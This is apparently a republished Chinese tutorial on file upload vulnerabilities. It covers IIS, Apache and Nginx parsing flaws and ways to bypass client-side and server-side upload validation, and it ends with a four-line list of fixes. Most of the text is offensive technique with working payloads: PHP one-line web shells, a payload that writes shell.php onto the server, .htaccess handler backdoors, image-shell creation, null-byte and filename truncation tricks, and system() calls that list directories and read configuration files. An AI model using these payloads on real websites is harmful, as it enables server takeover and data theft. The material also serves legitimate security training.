内容简介:一、文件解析漏洞二、上传本地验证绕过三、上传服务器端验证绕过
内容大纲:
一、文件解析漏洞
二、上传本地验证绕过
三、上传服务器端验证绕过
四、漏洞高级玩法
五、上传漏洞修复
一、文件解析漏洞
概念:
黑客将恶意文件上传到服务器中解析漏洞主要说的是一些特殊文件被iis、apache、nginx在某种情况下解释成脚本文件格式的漏洞
1.1、IIS6.0解析漏洞
1.目录解析
--创建/xx.asp/,上传图片马,即路径为:/xx.asp/xx.jpg,打开图片会被当着脚本来解析
,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。
2、分号解析
--nfck.asp;.jpg(其他类型nfck.php/.jpg nfck.php.jpg)
在IIS6.0下,分号后面的不被解析,会被服务器看成是xx.asp
3、畸形文件名解析
上传.asa\.cer\.cdx\.asax这四种文件格式也会被当着asp脚本来解析
1.2Apache解析漏洞
Apache是从右到左开始判断解析,如果为不可识别解析,就再往左判断
比如nfck.php.owf.rar ".owf"和“.rar”这两种后缀是Apache不可识别解析,Apache就会把该文件解析成PHP
如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个nfck.php.rara.jpg.png...
把知道的后缀都写一遍,去测试是否为合法后缀
任意不识别的后缀,自动向上识别
比如禁止上传的文件格式为PHP\ASP\ASPX\ASA等
那么把上传的文件这样写,X.PHP.NFCK
让后面的后缀名识别不了,就上传了一个X.PHP的文件
也可以直接将文件改成X.PHP. 后面加个点,或加个下划线_
1.3、IIS7.0/7.5/Nginx<8.03岖形解析漏洞
Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…在默认Fast-CGI开启状况下,黑阔上传一个名字为cracer.jpg,
内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,
然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马 shell.php
注:不仅仅是iis7.0/7.5,只要Fast-CGI开启状况下都可以利用该漏洞
1.4htaccess文件解析
一般为留后门使用,如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:
<FilesMatch "shell.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然后再上传shell.jpg的木马, 这样shell.jpg就可解析为 php 文件
1.5ntfs流漏洞
在windows系统的网站下,上传一个名称为:
a.asp.
a.asp_
a.asp. .
等网站无法识别的后缀,网站就把他当做成一个asp文件来进行执行,但是只能在启用黑名单的情况下使用
二、上传本地验证绕过
2.1、上传检测流程概述
通常一个文件以 HTTP 协议进行上传时,将以 POST 请求发送至 web 服务器 web 服务器接收到请求后并同意后,用户与 web 服务器将建立连接,并传输 data
2.2、服务器命名规则
第一种类型:上传文件名和服务器命名一致
第二种类型:上传文件名和服务器命名不一致(随机,时间日期命名等)
2.3、常见的上传检测方式
1.客户端 javascript 检测 (通常为检测文件扩展名)
2.服务端 MIME 类型检测 (检测 Content-Type 内容)
3.服务端目录路径检测 (检测跟 path 参数相关的内容)
4.服务端文件扩展名检测 (检测跟文件 extension 相关的内容)
5.服务端文件内容检测 (检测内容是否合法或含有恶意代码)
2.4、JS本地验证绕过
网站会采用白名单或者黑名单的形式限制文件上传的格式,当我们上传一个恶意文件文件时,会弹出窗口阻止,我们用burpsuite抓包,如果没有数据包,则代表网站用的上传验证是本地JS验证,在审查元素中仔细查看是可以发现允许上传文件或禁止上传文件的格式名称,我们添加或者删除就可以了。
把本地检测函数给去掉,如:ongubmit="return checkfile()"
三、上传服务器端验证绕过
3.1、服务端检测绕过(MIME 类型检测)
MIME的作用 : 使客户端软件,区分不同种类的数据,例如web浏览器就是通过MIME类型来判断文件是GIF图片,还是可打印的PostScript文件。
web服务器使用MIME来说明发送数据的种类, web客户端使用MIME来说明希望接收到的数据种类。
Tomcat的安装目录\conf\web.xml 中就定义了大量MIME类型 ,你可也去看一下。
绕过方法:
直接使用burp抓包,得到post上传数据后,将 Content-Type: text/plain改成 Content-Type: image/gif
就可以成功绕过。
3.2、服务端检测绕过(目录路径检测)
目录路径检测,一般就检测路径是否合法,可以利用目录路径绕过配合iis解析漏洞
在上传目录/后加上xx.asp/,这样就创建了一个xx.asp的目录,利用目录解析漏洞可以执行脚本。或者修改目录为/xx.asp;.,那么就上传了一个XX.ASP;.XX.JPG的文件 访问也是可以解析的,也可以进行目录截断,在目录后/xx.asp%00,选择%00点击ctrl+shift+U,然后上传进行截断,就上传了一个xx.asp脚本。
通过改变文件名称也可以绕过,比如上传一个文件名为xx.asp/xx.jpg文件,他也会创建一个xx.asp目录。
在上传脚本文件的时候,服务器没有对齐进行限制,但是在上传的目录上却没有执行的权限,可以在xx.asp前面加上../xx.asp 这样文件就上传到了他的上一级目录上,如果没有权限那么就一直返回,直到根目录下。
3.3、服务端检测绕过(文件扩展名检测)
3.3.1、检测的两种方式
1、黑名单检测
黑名单的安全性比白名单的安全性低很多,攻击手法自然也比白名单多 一般有个专门的 blacklist 文件,里面会包含常见的危险脚本文件例如 fckeditor 2.4.3 或之前版本的黑名单
2、白名单检测
白名单相对来说比黑名单安全一些,但也不见得就绝对安全了
3.3.2、黑名检测绕过:
1. 文件名大小写绕过
用像 AsP,pHp 之类的文件名绕过黑名单检测
2. 名单列表绕过
用黑名单里没有的名单进行攻击,比如黑名单里没有 asa 或 cer 之类
3. 特殊文件名绕过
比如发送的 http 包里把文件名改成 test.asp. 或 test.asp_(下划线为空格),这种命名方式 在 windows 系统里是不被允许的,所以需要在 burp 之类里进行修改,然后绕过验证后,会 被 windows 系统自动去掉后面的点和空格,但要注意 Unix/Linux 系统没有这个特性。
4. 0x00 截断绕过
用像 test.asp%00.jpg 的方式进行截断,属于白名单文件,再利用服务端代码的检测逻辑漏洞进行攻击,目前我只遇到过 asp 的程序有这种漏洞,ctrl+shift+U
3.3.3绕过白名单
1. 0x00 截断绕过
用像 test.asp%00.jpg 的方式进行截断,属于白名单文件,再利用服务端代码的检测逻辑漏洞进行攻击,目前我只遇到过 asp 的程序有这种漏洞,ctrl+shift+U
2. 解析漏洞或者配合文件包含
3.3.4双文件上传
条件:
接受两个文件同时上传
只检测了第一个文件扩展名
动易、南方、良精等CMS存在该漏洞
用burpsuite抓包,然后将请求头部分下面的内容负责,开头为-----,结尾为----------
其他地方不用负责,然后粘贴到第一个文件结尾-------后面,把第二个文件开头------去掉
将第一个文件的name=xxxx修改为name=xxxx1,修改文件名为cer或者asa等即可上传成功
4、服务端检测绕过(文件内容检测)
二次渲染:将图片中不需要的内容进行过滤,留下图片最基本的内容,这样就把一句话代码给去掉了
WAF检查文件内容(阿里云、知道创宇、长亭科技等):将一句话中的标签给过滤等
将标签中的php去掉,变为<??>即可
四、漏洞高级玩法
4.1、.htaccess 文件攻击
通过一个.htaccess 文件调用 php 的解析器去解析一个文件名中只要包含"haha"这个字符串的 任意文件,所以无论文件名是什么样子,只要包含"haha"这个字符串,都可以被以 php 的方 式来解析,是不是相当邪恶,一个自定义的.htaccess 文件就可以以各种各样的方式去绕过很 多上传验证机制
建一个.htaccess 文件,里面的内容如下
<FilesMatch "haha">
SetHandler application/x-httpd-php </FilesMatch>
同目录有个我们上传一个只有文件名并包含字符串"haha",但是却无任何扩展名的文件 里面的内容是 php 一句话木马
4.2、表单提交按钮
有些上传界面只有浏览文件按钮,没有上传按钮,那么我们就要自己写一个上传按钮。用火狐浏览器选择上传框右键审查元素,然后编辑HTML,写上<input type="gubmit">
写入表单
<input type="submit" value="提交" name="bb">
4.3、制作图片马技巧
准备一张图片和一个空文本,然后空文本写入一句话木马,cmd输入命令 copy1.jpg/b+1.txt/a 2.jpg
将一句话木马内容与图片内容进行合并、
一句话:<?php @eval($_GET['cmd']; ?> 密码cmd
可以使用菜刀连接或浏览器输入?cmd=phpinfo();
system('dir'); 可以爆网站目录
system('type d:\\phpstudy\\www\\dvwa-1.9\\php.ini'); 可以查看网站目录文件内容
\需要转译,而转译后是\,所以是\\
五、上传漏洞修复:
1、设置上传文件大小和格式内容相匹配
2、存储目录执行权限
3、站库分离(存储目录与web分离)
4、文件上传后压缩重生成
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 【技术分享】WebSocket漏洞与防护详解
- 【技术分享】WebSocket漏洞与防护详解
- CVE-2019-11477漏洞详解详玩
- 详解NSURLCache缓存引发的安全漏洞
- 详解Laravel 5.8 SQL注入漏洞
- CVE-2019-11477漏洞详解详玩(删)
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Domain-Driven Design
Eric Evans / Addison-Wesley Professional / 2003-8-30 / USD 74.99
"Eric Evans has written a fantastic book on how you can make the design of your software match your mental model of the problem domain you are addressing. "His book is very compatible with XP. It is n......一起来看看 《Domain-Driven Design》 这本书的介绍吧!